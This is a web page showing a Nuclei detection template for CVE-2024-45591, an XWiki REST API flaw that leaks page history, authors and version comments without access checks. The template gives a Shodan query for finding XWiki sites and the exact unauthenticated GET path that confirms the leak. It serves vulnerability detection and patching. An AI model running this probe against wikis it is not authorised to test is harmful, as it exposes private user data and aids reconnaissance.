Skip to content

XWiki Platform - Unauthorized Document History Access

ID: CVE-2024-45591

Severity: medium

Author: pd-bot

Tags: cve,cve2024,xwiki,exposure,rest-api

A vulnerability in XWiki Platform’s REST API allows unauthorized users to access document history information. The REST API endpoint exposes the history of any page including modification times, version numbers, author details (username and display name), and version comments, regardless of access rights configuration, even on private wikis.

id: CVE-2024-45591
info:
name: XWiki Platform - Unauthorized Document History Access
author: pd-bot
severity: medium
description: |
A vulnerability in XWiki Platform's REST API allows unauthorized users to access document history information. The REST API endpoint exposes the history of any page including modification times, version numbers, author details (username and display name), and version comments, regardless of access rights configuration, even on private wikis.
impact: |
An attacker can access document history of any known page
remediation: |
Upgrade to XWiki Platform version 15.10.9 or 16.3.0-rc-1 or later. No workarounds are available for earlier versions
reference:
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm
- https://jira.xwiki.org/browse/XWIKI-22052
- https://nvd.nist.gov/vuln/detail/cve-2024-45591
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-45591
cwe-id: CWE-359,CWE-862
cpe: cpe:2.3:a:xwiki:platform:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: xwiki
product: xwiki-platform
shodan-query: http.html:"data-xwiki-reference"
tags: cve,cve2024,xwiki,exposure,rest-api
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'version'
- 'historySummary'
- 'pageId'
- 'comment'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100cd396d186d81ce23f77858aab5c60b69fff5045cf0ce729d5f68dccf03cd86f8022100c74ffca7896bb4a921b5e43c04c6a890e56ec6ad80c7d148fded0fc6fa843254:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-45591.yaml"

View on Github